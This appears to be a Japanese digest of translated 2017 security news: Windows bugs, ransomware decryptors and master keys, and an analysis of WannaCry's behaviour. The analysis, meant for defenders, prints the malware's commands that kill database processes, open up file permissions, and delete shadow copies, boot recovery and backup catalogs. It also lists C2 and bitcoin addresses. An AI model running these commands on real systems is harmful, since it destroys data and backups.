    https://www.suse.com/security/cve/CVE-2017-1000367.html


    Microsoftが、先週Malware Protection Engineの沢山のバグをパッチしていた
    The Register : Security (2017/05/29)
     Microsoftは、Google Project Zeroからコッソリ通知されていたMalware Protection Engineの沢山のバグをパッチするための定例外のアップデートをリリースしていた。
     Project ZeroのMateusz Jurczykは、「とんでもなく酷い」バグを公開しなかった。この新しいバグは全て「Microsoft Malware Protection EngineのDoS(Denial of Service)脆弱性」もしくは、「Microsoft Malware Protection Engineリモートコード実行脆弱性」と名付けられているが、Microsoftの発表では8つの個別のバグが記述されている。
     これらは全て、同種の脆弱性に関する異なる観点のものである。このMalware Protection Engineに細工されたファイルをスキャンさせると、あなたは、Malware Protection Engineを殺すか、メモリ損壊を介してMalware Protection Engineをクラッシュさせることができる。
     個別のバグは、CVE-2017-8535, CVE-2017-8536, CVE-2017-8537, CVE-2017-8538, CVE-2017-8539, CVE-2017-8540, CVE-2017-8541, CVE-2017-8542である。
     このバグは、コチラのProject Zeroで説明されている。
     Jurczykは、NULLポインター逆参照、0による除算、無限再帰のバグは、DoSのリスクをもたらすだけであるが、リモートコード実行のバグはメモリ損壊のバグに基づいていると言及している。
     Microsoft Malware Protection Engineの企業ユーザは、この修正が自動的に適用されるので、何も実行する必要はない。Microsoftは、このアナウンスを実行する前にパッチを発行している。


    Microsoftのマスター ファイル テーブルのバグは、Windows 7、8.1をBSODにする脆弱性が存在している
    The Register : Security (2017/05/29)
     Microsoftが、この問題をパッチするまで、Chromeを使用しなさい。ファイルパス処理の手落ちは、攻撃者がファイルをコールして、Windows 7、8.1をクラッシュさせることが可能になっている。
     このバグは、Windowsのマスター ファイル テーブルがディレクトリ パス中に含まれているか否かが引き金になっていた。例えば、攻撃者が、Webサイト中のイメージへのリンクとして$MFT(マスター ファイル テーブル)を含んでいたような場合である。
     ロシアのAlladin Information SecurityのAnatolymikは、コチラ(ロシア語)に発見に関して主張している。
     $MFTは、ユーザーアクセスから保護されるようにサポートされている。その適切な理由は、NTFSボリューム上の全てのファイルは、MFTを参照していることにある。
     この研究者が発見したことは、あなたが、c:\$MFT\foo のようなファイルにアクセスしようとした場合、NTFS(NTファイルシステム)は、$MFTをロックし、それを解放しないということであった。「それは、ずっとキャプチャされたままだろう」、「それ故、例えば、ファイルを作成しようとした時や、ファイルのボリュームを読み込もうとした時に、NTFSは、ERESOURCE $ MFTファイルを専有しようとするので、永久にこの段階でハングするだろう」と、このポストは述べている。
     Bleeping Computerは、Chromeユーザは、Chromeが悪意あるパスの付随するイメージを認識しブロックするので、遠隔から攻撃されることはない。しかしながら、Internet ExplorerとFirefoxは共に脆弱性があると、忠告している

    Wallet身代金要求型マルウェアのマスターキーがBleeping Computerにリリースされた。Avastが無料の復号ツールをリリース
    BleepingComputer : News>Security (2017/05/18)
     今朝、BleepingConputer.comの新規登録メンバーが、我々のフォーラムにWallet身代金要求型マルウェア用のマスター復号キーを投稿した。この投稿は、lightsentineloneと名乗るメンバーが、Dharma Ransomware Support Topicに米国東部時間9:13(日本時間、5月18日 22:15)に作成したものであり、Pastebinへのリンクを含んでいた。


     リリースされたWalletキーに関するBleepingComputer.comへの投稿

     このPastebinへの投稿は、正当なものと確認された198の復号キーを含むCヘッダーファイルで構成されており、Wallet身代金要求型マルウェア復号プログラムを作成するためにセキュリティ研究者によって使用された。
     この身代金要求型マルウェアは、以下に見られるように恐ろしく広汎に拡散しているので、この復号プログラムのリリースで、多くの犠牲者がファイルを復号できたと投稿してくることを想像できる。


     Dharma感染色分け地図

     そこで、あなたが身代金要求型マルウェアに感染し、身代金を支払う意思がないのであれば、将来復号プログラムがリリースされた場合に備えて、あなたの暗号化されたファイルを安全な場所に格納しておきなさい。
     この復号プログラムの使用に支援を必要としたり、問題に遭遇した人は誰でも、専用のDharma Ransomware Help & Support Topicで、我々に知らせなさい。

    何故Wallet身代金要求型マルウェアの開発者は復号キーをリリースしたのか?

     Walletの属する身代金要求型マルウェアのCrysisファミリーは、彼等が新しい拡張子に切り替えた時、それまでの変種のマスター復号キーをリリースすることを常としている。例えば、2016/11/14、Crysisマスター復号キーは、BleepingComputer上にリリースされた。2017/03/01、DharmaキーがBleepingComputer上にリリースされた。そして本日、我々は、Walletのキーをリリースされた。
     この身代金要求型マルウェア ファミリーは、最近 .onion 拡張子を使用するように切り替えたので、今迄のバージョンのキーがリリースされたところで驚くことではない。
     これは、この身代金要求型マルウェアの開発者が使用しているパターンを示しているが、彼等がキーをリリースしている理由を説明しているわけではない。この時点で、身代金を支払う意思のある者は、既に支払っているだろう。そこで、彼等が善意から、これを実行しているということはあり得ることである。それ故、キーをリリースしても、彼等の利益を損なわれることはなく、影響を受けた人々の顔色を良くするだけである。
     願わくば、この挙動は、かれらが最早収益を挙げることのなくなった古いバージョン用のキーをリリースする意思があるかもしれない他の開発者によって模倣されるだろうことを。

    Crysis用のAvast復号ツールを使用してWalletを復号する方法(Onionも可能かもしれない)

    アップデート(2017/05/20): リリースされたマスター復号キーは、.onion変種で感染した人の一部を復号しているかのようである。従って、あなたが、.onion拡張子で構成されるファイル暗号化に感染しているのであれば、あなたのファイルに関して動作する可能性があるので、この復号ツールを試すべきである。

    Wallet身代金要求型マルウェアの犠牲者は、ファイルが、[filename].[email].walletの形式に暗号化され、リネームされていることで同定することができる。たとえば、最近の変種は、test.jpgと名付けられていたファイルを、test.jpg.[destroed_total@aol.com].walletとして暗号化している。
     あなたは、暗号化されたファイルのフォルダの例を以下に見ることができる。 


     Walletで暗号化されたファイル

     わたしはまた、この記事の末尾に、完全なeMailアドレスのリストを含めた。ID-RansomewareMichael Gillespieに感謝する。
     Wallet身代金要求型マルウェアによって暗号化されたファイルを復号するには、コチラ(http://files.avast.com/files/decryptor/avast_decryptor_crysis.exe)から、AvastのCrysis Decryptorを最初にダウンロードする。
     ダウンロードしたら、このプログラムをダブルクリックし、メイン画面を表示する。


     Crysis用Avast復号ツール

     開始する前に、必ず、Wallet身代金要求型マルウェアの本日リリースされたキーをサポートしているバージョンである 1.0.103.0 を使用していることを確認する必要がある。この復号ツールのバージョンをチェックするには、上の画像中に見られるプログラムのタイトルバーに注目しなさい。あなたが正しいバージョンを使用しているのであれば、進行するためにNextボタンをクリックしなさい。
     これで、暗号化されたファイルを復号するためにスキャンしたい任意のドライブを追加するための画面になる。


     Crysis用Avast復号ツール

     上の画面で、未だ選択されていないドライブを追加し、次にNextボタンをクリックする。
     ここで、この復号ツールが機能する方法に関する様々なオプションを選択する画面になる。


     復号オプション画面

     この二つのオプションをチェックしたままにして、ファイルの復号を開始するためにDecryptボタンをクリックする。この復号プログラムは管理者権限で実行する必要があるので、UACプロンプトが表示され、このまま実行するか否か尋ねられるだろう。安全なので、このプロンプトではYesを押す。
     この復号プログラムは、選択されているドライブをスキャンし、検出された暗号化されたファイルを復号するだろう。


     ファイル復号中

     このプロセスには大変な時間がかかるので、この復号プログラムが、コンピュータをスキャンし、ファイルを復号している間は我慢しなさい。どの位の時間がかかるのかの目安としては、私のテスト コンピュータは大変僅かなファイルしか持っていなかったが、30分以上かかった。コンピュータが多くのファイル(特に大きなファイル)を持っている場合には、このプロセスは大変長い時間が掛かるだろう。
     この復号プログラムが終了すると、復号されたファイルの数を示す概要のページが表示される。


     復号完了

     あなたのファイルは復号されたが、オリジナルの暗号化されたファイルは依然としてあなたのコンピュータに残存している。ファイルが適切に復号されたことを確認したら、あなたの暗号化されたファイルの全てを特定のフォルダに移動するためにCryptoSearchを使用しなさい。これで、それらを削除したりアーカイブしたりすることができる。

     これで、この復号プログラムを終了することができ、あなたのコンピュータを通常通り使用することができる。この復号プログラムの使用に支援を必要とするのであれば、Dharma Ransomware Help & Support Topicで質問しなさい。

    既知のWallet eMailアドレス

      3048664056@qq.com
      age_empires@aol.com
      aligi@zakazaka.group
      amagnus@india.com
      amanda_sofost@india.com
      braker@plague.life
      breakdown@india.com
      crann@india.com
      crann@stopper.me
      crannbest@foxmail.com
      cryalex@india.com
      Cryptime@india.com
      crysis@indya.life
      danger_rush@aol.com
      dderek416@gmail.com
      dderek@india.com
      ded_pool@aol.com
      denied@india.com
      destroed_total@aol.com
      diablo_diablo2@aol.com
      donald_dak@aol.com
      dropped@india.com
      enterprise_lost@aol.com
      fedor2@aol.com
      fidel_romposo@aol.com
      fire.show@aol.com
      first_wolf@aol.com
      flashprize@india.com
      fly_goods@aol.com
      gotham_mouse@aol.com
      grand_car@aol.com
      gutentag@india.com
      HelpRobert@gmx.com
      ice_snow@aol.com
      info@kraken.cc
      injury@india.com
      interlock@india.com
      joker_lucker@aol.com
      kuprin@india.com
      last_centurion@aol.com
      lavandos@dr.com
      legionfromheaven@india.com
      m.reptile@aol.com
      m.subzero@aol.com
      makedonskiy@india.com
      mandanos@foxmail.com
      matacas@foxmail.com
      mission_inposible@aol.com
      mission_inpossible@aol.com
      mk.baraka@aol.com
      mk.cyrax@aol.com
      mk.goro@aol.com
      mk.jax@aol.com
      mk.johnny@aol.com
      mk.kabal@aol.com
      mk.kitana@aol.com
      mk.liukang@aol.com
      mk.noobsaibot@aol.com
      mk.raiden@aol.com
      mk.rain@aol.com
      mk.scorpion@aol.com
      mk.sektor@aol.com
      mk.sharik@aol.com
      mk.smoke@aol.com
      mk.sonyablade@aol.com
      mk.stryker@aol.com
      mkgoro@india.com
      mkjohnny@india.com
      MKKitana@india.com
      Mkliukang@india.com
      mknoobsaibot@india.com
      mkscorpion@india.com
      MKSmoke@india.com
      mksubzero@india.com
      moneymaker2@india.com
      nicecrypt@india.com
      nomascus@india.com
      nort_dog@aol.com
      nort_folk@aol.com
      obamausa7@aol.com
      p_pant@aol.com
      reserve-mk.kabal@india.com
      sammer_winter@aol.com
      shamudin@india.com
      sman@india.com
      smartsupport@india.com
      spacelocker@post.com
      space_rangers@aol.com
      ssama@india.com
      stopper@india.com
      supermagnet@india.com
      support_files@india.com
      tanksfast@aol.com
      terrabyte8@india.com
      total_zero@aol.com
      versus@india.com
      walmanager@qq.com
      warlokold@aol.com
      war_lost@aol.com
      webmafia@asia.com
      webmafia@india.com
      xmen_xmen@aol.com
      zaloha@india.com


    BTCWare身代金要求型マルウェアのマスターキーがリリースされ、無料復号ツールが利用可能になった
    BleepingComputer : News>Security (2017/05/16)
     BTCWareの古いバージョンで暗号化されたファイルを所有するユーザは、セキュリティ研究者が、この身代金要求型マルウェア ファミリーの復号プログラムを作成したので、無料でファイルを修復することができる。この復号プログラムに関する作業は、4月末に開始された。
     月始めにBTCWare復号プログラムの初期バージョンのリリースに続き、或るユーザが、BleepingComputerフォーラムのBTCWare身代金要求型マルウェア用のマスター復号キーをリリースした。このユーザ(彼自身はchecker123と名乗っている)が、BTCWare身代金要求型マルウェアの作者なのか、彼等のライバルを妨害しようとする競合する身代金要求型マルウェア チームのメンバーなのか定かでないが、何れにせよ我々は嬉しく思う。たとえ、彼が我々のコメントの要請に対応しなくとも、我々は、checker123が、この身代金要求型マルウェアの作者であると思っている。

    BTCWareは大変アクティブな身代金要求型マルウェア株である

     BTCWare身代金要求型マルウェアは、セキュリティ研究者MalwareHunterKarsten Hahnが、その最初のバージョン(当初CrptXXXとして知られていた)を偶然見つけた3月初旬に、マルウェアシーンにその存在を印象づけた。


     CrptXXX脅迫文

     我々が後にBTCWareあるいはCryptoByteと呼び始めた新しいバージョンが一週間後現れ、そして、その後に新し変種が現れた。


     BTCWare脅迫文(画像をクリックすると拡大します)

     CerberやSporaほど流行していないが、BTCWareは、殆どの人々が考えているより成功している。ID-Ransomwareサービスによって提供された、この感染図表に基づくと、この身代金要求型マルウェアは、一日平均凡そ10感染している。これは、SageやLockyのような、もっと有名な同種のマルウェアの一部と同じレベルである。


     BTCWare感染統計(画像をクリックすると拡大します)


     2017年4月初旬での身代金要求型マルウェア感染統計(画像をクリックすると拡大します)

     発見されて以来、我々は三つのメジャーなBTCWareバージョン(それらが暗号化したファイルの末尾に追加したファイル拡張子で識別可能)を見てきた。

    .[< email address >].btcware
    .[< email address >].cryptobyte
    .[< email address >].cryptowin
    .[< email address >].theva

     これらの二つに関しては、セキュリティ研究者Francesco Muroniが既に、暗号をブルート・フォースし、復号キーを取得するスクリプトを作成している。この二つとは、.btcware と .crptobyteである。このスクリプトは、コマンドラインを使用することから通常ユーザが使用するのは難しかったので、セキュリティ研究者Michael Gillespieは、見栄えのするGUIを作成した。


     checker123が、BTCWareマスターキー(全ての犠牲者用の普遍的復号キー)をリリースした後、Gillespieは、その有効性をテストし、.btcware と .cryptowinの変種に関しても動作することを発見した。
     これは、このマスター復号キーを使用しようと、暗号化スキームをブルートフォースする今までの方法を使用しようとも、最初の三つのBTCWareバージョンを復号する方法が現在存在していることを意味している。
     過去二週間に渡り、Gillespieは、checker123によって本日リリースされたマスターキーを含ませるように、今迄のBTCWare Decrypterのアップデート作業をしてきており、この研究者が復号プログラムの最適化を終了した時点であったが、彼は三つ目のバージョンを同様にブルート・フォースする方法を発見した。
     現在、BTCWare DecrypterはDefaultでブルート・フォースを使用するが、信頼性は向上している。BTCWareに感染したユーザは、ファイルを復元するために、この復号プログラムを使用することができる。ユーザは、コチラをクリックして復号プログラムをダウンロードできる。以下は、Michaelの指示である。

     あなたのキーを抽出するためには、暗号化されたファイルと、そのオリジナルのファイルの両方を必要とする。Settings -> Find Key に移動し、このファイルをロードする。次に、ブルート・フォースを開始する。このプログラムがキーを発見すると、ダイアログが閉じ、キーがロードされる。これで、選択されているディレクトリを復号するための準備ができた。

    復号プログラムはOnyonware用のサポートを追加してアップデートされるだろう

     この記事は当初、5月4日に記述されたが、Gillespieが、この復号プログラムの最適化作業をしていたために公開されなかった。更に時が経ち、BTCWareのマスターキーが我々のフォーラムにリークされた理由が明らかになった。
     このBTCWareの作者(達)は、数日後(5月9日)に、彼等の身代金要求型マルウェアを、暗号化したファイルの末尾に ".[< email >].theva" 拡張子を付ける新しいバージョンにアップデートした。更に、昨日(5月15日)、彼/彼等は、Onyonwareと名付けられた新しい身代金要求型マルウェアを作成し起動した。
     後で分かったことだが、古いBTCWareバージョンのマスターキーをリリースすることは、彼等の活動に、そんなにダメージを与えることはない。身代金要求型マルウェアの作者は、彼等が新しい身代金要求型マルウェアの変種を終えると、時々マスター復号キーをリリースする。これは、おそらく好意からと思われるが、その時点で、彼等は新しい身代金要求型マルウェアのバージョンに移行しており、古いバージョンに感染して身代金を支払おうとしている犠牲者は、既に支払いを終えているためである。
     本日、Twitterで、BTCWare DecrypterがOnyonwareをサポートするようにしたことを、Gillespieは確認した。この研究者は、彼が4番目のBCTWareバージョンを解決できるか否か、依然として調査している。

    【訳注】 この後、checker123によるフォーラムへのポスト等が続きますが、省略します。


    Wana Decryptor / WannaCrypt0rnによる巨大攻撃について
    BBC:Technology / BleepingComputer:News>Security (2017/05/13)
    【訳注】 幾つかの報道を纏めてあります。

    BBCから(日本時間、8:00頃にリリースされた記事から)

     米国国家安全保障局によって開発されたと信じられているツールを使用した巨大なサイバー攻撃が世界中の組織を攻撃している。
     各地の数千のコンピュータがBitcoinで、$300(£230、約33566円)を要求するプログラムでロックされた。
     4月、The Shadow Brokersとして知られるハッカーは、このツールを盗み出し、それらをオンラインにリリースしたと主張していた。
     Microsoftは、3月にこの脆弱性に関するパッチをリリースしたが、多くのシステムがアップデートされていない可能性がある。
     この感染は、イギリス、アメリカ、中国、ロシア、イタリア、台湾を含む99ヵ国に感染しているとレポートされている。

    BleepingComputerが、日本時間、5:00頃にリリースした記事から

     感染している国のチャート。


     画像をクリックすると拡大します

    地に落ちたWana Decryptor / WannaCrypt0rn技術(BleepingComputerより、全文和訳)

     Telefonica(テレフォニカ。【訳注】 スペイン・マドリードに本拠を置く大手通信事業者)、中国の大学群、ロシア内務省、他の組織に巨大な身代金要求型マルウェアを急激に増加させることにより世界中に嵐を見舞ったことにより、本日は、WannaCrypt0r身代金要求型マルウェアにとって重要な日となった。BleepingComputerが、この勃発を詳細にカバーすることで、このマルウェアを取り扱う可能性のあるIT分野の人々が、このマルウェアの動作方法の基本を理解をすることが、WannaCrypt0r身代金要求型マルウェアを低下させるための適切な考えであると、私は思う。
     残念ながら、現時点で、WannaCrypt0rで暗号化されたファイルは、無料で復号することはできない。あなたが、この身代金要求型マルウェアの支援とサポートを必要としているのであれば、BleepingComputerは、専門のWannaCrypt0r Wana Decrypt0r Help & Support Topicをセットアップしている。

    この身代金要求型マルウェアは、WannaCryptor, WannaCrypt0r, Wana Decrypt0rと呼ばれている

     この身代金要求型マルウェアの公式の内部名はWannaCrypt0rであるが、あなたが、このマルウェアを別名で呼んでいる新しい記事を読むことがあるだろう。これは、この身代金要求型マルウェアが、Wana Decrypt0r 2.0と呼ばれるロックスクリーン/復号プログラム を持っていることによる。このプログラムは、全ての犠牲者が、感染させられたデスクトップ上に見るものであり、異なる内部名であり、WNCRY拡張子でファイルを暗号化している。
     では、我々は、このマルウェアを何と呼べばいいのか? 私は、このマルウェアの実名であるWannaCrypt0rに固定すべきであると考える。残念ながら、殆どの人々は、彼等が見た最初のものがWana Decrypt0rと名付けられたロックスクリーンであるがために、このマルウェアをWannaCrypt0rと呼ばないだろう。WanaDecrypt0rは、殆どの人々が検索に使用する名前なので、我々は、この記事では、このマルウェアをWanaDecrypt0rもしくはWannaCrypt0rと呼ぶことにする。

    WannaCrypt0rは、どのように拡散しているのか?

     MalwareHunterTeamは、数週間前に最初にWannaCrypt0r見つけたが、この身代金要求型マルウェアは、この数週間の間の大部分に関して、殆ど拡散しなかった。突然、WannaCrypt0rは爆発し、ETERNALBLUEと呼ばれるエクスプロイト(【訳注】 スクリプト、あるいはプログラムの1つで、コンピュータ関連においてソフトウェアやハードウェアの脆弱性を利用し、悪意を持った行為のために書かれたもの(IT用語辞典より))を介して燎原の火の如く拡散し始めた。ETERNALBLUEは、米国安全保障局のエクスプロイトであると言われ、The Shadow Brokerと呼ばれるハッキンググループによって先月オンラインにリークされた
     このエクスプロイトは、SMBv1プロトコルを介してリモートマシンへのアクセスを取得することで動作する。残念ながら、Microsoftが3月にこのフローをパッチ(MS17-010)していたにも拘わらず、多くの人々は、このパッチをインストールしていなかったようである。
     あなたが、MS17-010セキュリティ ブレティンで言及されているアップデートをインストールしていないのであれば、現在実行している全てのことを停止し、このパッチをインストールしなさい。もちろん、これは重要なことなので、私は既に実行済みである。この身代金要求型マルウェアは、気が狂ったかのように拡散中であり、無料での復号方法を知られていない。それ故、感染してファイルを失わないように、このアップデートをインストールしなさい。

    WannaCrypt0rは、どのようにコンピュータを暗号化しているのか?

     コンピュータがWana Decrypt0rに感染すると、このインストーラは、同じフォルダ中にある埋め込まれたファイルを解凍する。この埋め込まれたリソースは、パスワードで保護されたZIPファイルであり、WannaCrypt0rによって使用され実行される様々なファイルを含んでいる。


     埋め込まれているパスワードで保護されたZIPファイル(画像をクリックすると拡大します)

     WanaDecrypt0rローダーは、このZIPファイルのコンテンツを、このローダーと同じフォルダに解凍し、幾つかのスタートアップ タスクを実行する。これは最初に、msgフォルダに、ローカライズされた(【訳注】 犠牲者の国の言語に対応した)脅迫文を抽出する。現在サポートされている言語は以下である。

    ブルガリア語、中国語(簡字体、繁字体)、クロアチア語、チェコ語、オランダ語、デンマーク語、英語、フィリピン語
    フィンランド語、フランス語、ドイツ語、ギリシャ語、インドネシア語、イタリア語、日本語、韓国語、ラトビア語
    ノルウェー語、ポーランド語、ポルトガル語、ルーマニア語、ロシア語、スロバキア語、スペイン語、スウェーデン語
    トルコ語、ベトナム語
     次に、WannaCrypt0rは、https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipからTORクライアントをダウンロードし、TaskDataフォルダに解凍する。このTORクライアントは、gx7ekbenv2riucmf.onion, 57g7spgrzlojinas.onion, xxlvbrloxvriy2c5.onion, 76jdd2ir2embyv47.onion, cwwnhwhlz52maqm7.onionで、この身代金要求型マルウェアのコマンド&コントロール サーバと通信するために使用される。
     可能な限り多くのファイルを暗号化できるようにコンピュータを下調べするために、icacls . /grant Everyone:F /T /C /Q コマンドを、ここで実行する。これで、この身代金要求型マルウェアが実行されているフォルダとチャイルド フォルダに配置されているファイルに対して全ての者がフルパーミッションを持つように変更される。次に、データベースとメールストアを同様に暗号化し、データベースサーバとメールサーバに関連するプロセスを終了する。
     このデータベース プロセスを終了するために実行されるコマンドは以下である。

    taskkill.exe /f /im mysqld.exe
    taskkill.exe /f /im sqlwriter.exe
    taskkill.exe /f /im sqlserver.exe
    taskkill.exe /f /im MSExchange*
    taskkill.exe /f /im Microsoft.Exchange.*

     これで、Wana Decrypt0rは、コンピュータ上のファイルの暗号化を開始する準備ができた。ファイルを暗号化している時、Wana Decrypt0rは、以下の拡張子を持っているファイルだけを暗号化する。

    .der, .pfx, .key, .crt, .csr, .pem, .odt, .ott, .sxw, .stw, .uot, .max, .ods, .ots
    .sxc, .stc, .dif, .slk, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay
    .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi
    .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .vbs, .dip, .dch, .sch
    .brd, .jsp, .php, .asp, .java, .jar, .class, .wav, .swf, .fla, .wmv, .mpg, .vob
    .mpeg, .asf, .avi, .mov, .mkv, .flv, .wma, .mid, .djvu, .svg, .psd, .nef, .tiff
    .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar
    .tgz, .tar, .bak, .tbk, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx
    .sti, .sxi, .hwp, .snt, .onetoc2, .dwg, .pdf, .wks, .rtf, .csv, .txt, .vsdx, .vsd
    .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm
    .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls
    .dotx, .dotm, .dot, .docm, .docb, .docx, .doc,

     ファイルが暗号化されると、この身代金要求型マルウェアは、ファイルが暗号化されたことを意味する .WNCRY 拡張子を暗号化したファイルに追加する。例えば、test.jpgファイルが暗号化されると、test.jpg.WNCRYに名前が変わる。


     WNCRY暗号化されたファイルのフォルダ(画像をクリックすると拡大します)

     ファイルを暗号化している時、Wana Decrypt0rはまた、@Please_Read_Me@.txt脅迫文と、ファイルを暗号化した全てのフォルダに@WanaDecryptor@.exe復号プログラムのコピーを格納する。我々は後で、これらのファイルを見るだろう。
     最後に、WannaCrypt0rは、シャドー・ボリューム・コピーを削除し、Windowsスタートアップ・リカバリを無効化し、Windows Serverバックアップ履歴を削除するために幾つかのコマンドを実行する。発生するコマンドは以下である。

    C:\Windows\SysWOW64\cmd.exe /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

     これらのコマンドは管理者権限を必要とするので、犠牲者は以下に見られるようなUAC(ユーザーアカウント制御)プロンプトを表示されるだろう。


     ユーザーアカウント制御

     最終的に、Wana Decryptor 2.0ロック画面が表示される。この画面は、身代金の支払い方法と、あなたが上にリストした言語の一つを選択することが可能であるという追加情報を含んでいる。


     Wana Decrypt0r 2.0ロック画面(画像をクリックすると拡大します)

     あなたが、Check Paymentボタンをクリックすると、この身代金要求型マルウェアは、支払いが実行されているか否か確認するためにTORコマンド&コントロール サーバへの接続を回復させる。支払いが実行されていれば、この身代金要求型マルウェアは、自動的にあなたのファイルを復号する。支払いが実行されていない場合は、以下のような対応を見ることになる。


     支払いが実行されていない場合の対応

     WannaCrypt0r身代金要求型マルウェアは、三つのハードコードされたBitcoinアドレスを持っている。これらのBitcoinアドレスは、13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw, 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLnである。私は何かを見落としているかもしれないが、私が理解できないことは、大変多くの人々が同じBitcoinアドレスを使用したなら、この身代金要求型マルウェアの開発者は、どのようにして、支払っていない犠牲者と支払いをした犠牲者を識別することが可能なのかということである。
     例えば、誰かが私に割り当てられたBitcoinアドレスに身代金を支払ったとしても、依然として、このプログラムは、私が支払っていないと宣言している。
     このWana Decryptor 2.0画面はまた、あなたがこの身代金要求型マルウェアの開発者に連絡を取るためのフォームを開くことのできるContact Usを持っている。


     Contuct Usのフォーム

     また、この身代金要求型マルウェアは、あなたのデスクトップ壁紙を、以下に示す別の脅迫文に差し替えるだろう。


    デスクトップ壁紙(画像をクリックすると拡大します)

     大事なことを言い忘れていたが、脅迫文は、詳細情報とFAQ(よくある質問)の回答を含んでデスクトップ上に放置されるだろう。


    @Please_Read_Me@.txt脅迫文(画像をクリックすると拡大します)

     先述したように、残念ながら、この身代金要求型マルウェアは無料で復号することができない。あなたの最善の処置はバックアップから修復することである。もしもバックアップが存在しないのであれば、この身代金要求型マルウェアが、適切にシャドー・ボリューム・コピーを削除していないことに一縷の望みを抱いてShadow Explorerのようなプログラムを試すことである。ユーザがUACプロンプトでYesをクリックしなかった人々は、修復可能なチャンスが存在している。
     シャドー・ボリューム・コピーからファイルを修復するガイドは、How to recover files and folders using Shadow Volume Copiesに発見される。
     あなたが、この身代金要求型マルウェアで支援とサポートを必要とするのであれば、BleepingComputerは、専門のWannaCrypt0r Wana Decrypt0r Help & Support Topicをセットアップしている。

    Wana Decrypt0rを、どのようにして防御すればいいのか?

     新しい脅威からあなたを保護するために挙動防御を活用するセキュリティソフトウェアをアップデートすることとは別に、あなたのコンピュータに最新のWindowsセキュリティ アップデートの全てをインストールしておくことは回避できないことである。一部の企業に関して、最新のセキュリティアップデートが出現した時それらをインストールすることが、彼等の「パッチの管理指針」の一部ではないことを、私は認識しているが、疑われている米国国家保安局のリモート・エクスプロイトを修正するアップデートは、当に優先されなければならない。
     何らかの理由から、全てのWindowsアップデートをインストールすることが不可能であるのなら、あなたは、少なくともMicrosoftのセキュリティ・ブレティンMS17-010で論議されているアップデートはインストールしなければならない。セキュリティ研究者Bartはまた、SMBv1は最先端のWindowsでは必ず使用しなければならないものではないので、SMBv1を無効にするように推奨している。SMBv1を無効化する方法に関しては、同様にMS17-010ブレティン中に見出すことができる。  素晴らしい挙動検出付きのソフトウェア製品に関しては、私は、Emsisoftの挙動ブロック・コンポーネントであるEmsisoft Anti-Malwareを強く推奨する。あなたは大きな安心を得るだけでなく、彼等の挙動ブロッカーは、新しい0-Dayの身代金要求型マルウェアがコンピュータを暗号化することを妨げることに驚くべき実績がある。
     以下は、私がEmsisoft Anti-MalwareのBehavior Blocker(挙動ブロッカー)を有効にした状態で、Wana Decrypt0rインストーラを実行させた時に発生したことである。

     残念ながら、この挙動ブロッカーは有料版でのみ利用可能なので、この機能の便益を享受するには、Emsisoft Anti-malwareを購入する必要がある。
     あからさまに言うと、あなたが上のリンクからEmsisoft Anti-Malwareを購入すると、我々は歩合をもらうことができる。そう云う訳で、私がこのプログラムを信じており、身代金要求型マルウェアや他のマルウェアから、あなたを防御する大変素晴らしい仕事を実行できることから、私はEmsisoft Anti-malwareだけを推奨する。

    IOC

    Hashes
    SHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

    Wana Decrypt0r / WannaCrypt0r関連ファイル
    [Installed_Folder]\00000000.eky
    [Installed_Folder]\00000000.pky
    [Installed_Folder]\00000000.res
    [Installed_Folder]\@WanaDecryptor@.exe
    [Installed_Folder]\@WanaDecryptor@.exe.lnk
    [Installed_Folder]\b.wnry
    [Installed_Folder]\c.wnry
    [Installed_Folder]\f.wnry
    [Installed_Folder]\msg\
    [Installed_Folder]\msg\m_bulgarian.wnry
    [Installed_Folder]\msg\m_chinese (simplified).wnry
    [Installed_Folder]\msg\m_chinese (traditional).wnry
    [Installed_Folder]\msg\m_croatian.wnry
    [Installed_Folder]\msg\m_czech.wnry
    [Installed_Folder]\msg\m_danish.wnry
    [Installed_Folder]\msg\m_dutch.wnry
    [Installed_Folder]\msg\m_english.wnry
    [Installed_Folder]\msg\m_filipino.wnry
    [Installed_Folder]\msg\m_finnish.wnry
    [Installed_Folder]\msg\m_french.wnry
    [Installed_Folder]\msg\m_german.wnry
    [Installed_Folder]\msg\m_greek.wnry
    [Installed_Folder]\msg\m_indonesian.wnry
    [Installed_Folder]\msg\m_italian.wnry
    [Installed_Folder]\msg\m_japanese.wnry
    [Installed_Folder]\msg\m_korean.wnry
    [Installed_Folder]\msg\m_latvian.wnry
    [Installed_Folder]\msg\m_norwegian.wnry
    [Installed_Folder]\msg\m_polish.wnry
    [Installed_Folder]\msg\m_portuguese.wnry
    [Installed_Folder]\msg\m_romanian.wnry
    [Installed_Folder]\msg\m_russian.wnry
    [Installed_Folder]\msg\m_slovak.wnry
    [Installed_Folder]\msg\m_spanish.wnry
    [Installed_Folder]\msg\m_swedish.wnry
    [Installed_Folder]\msg\m_turkish.wnry
    [Installed_Folder]\msg\m_vietnamese.wnry
    [Installed_Folder]\r.wnry
    [Installed_Folder]\s.wnry
    [Installed_Folder]\t.wnry
    [Installed_Folder]\TaskData\
    [Installed_Folder]\TaskData\Data\
    [Installed_Folder]\TaskData\Data\Tor\
    [Installed_Folder]\TaskData\Tor\
    [Installed_Folder]\TaskData\Tor\libeay32.dll
    [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
    [Installed_Folder]\TaskData\Tor\libssp-0.dll
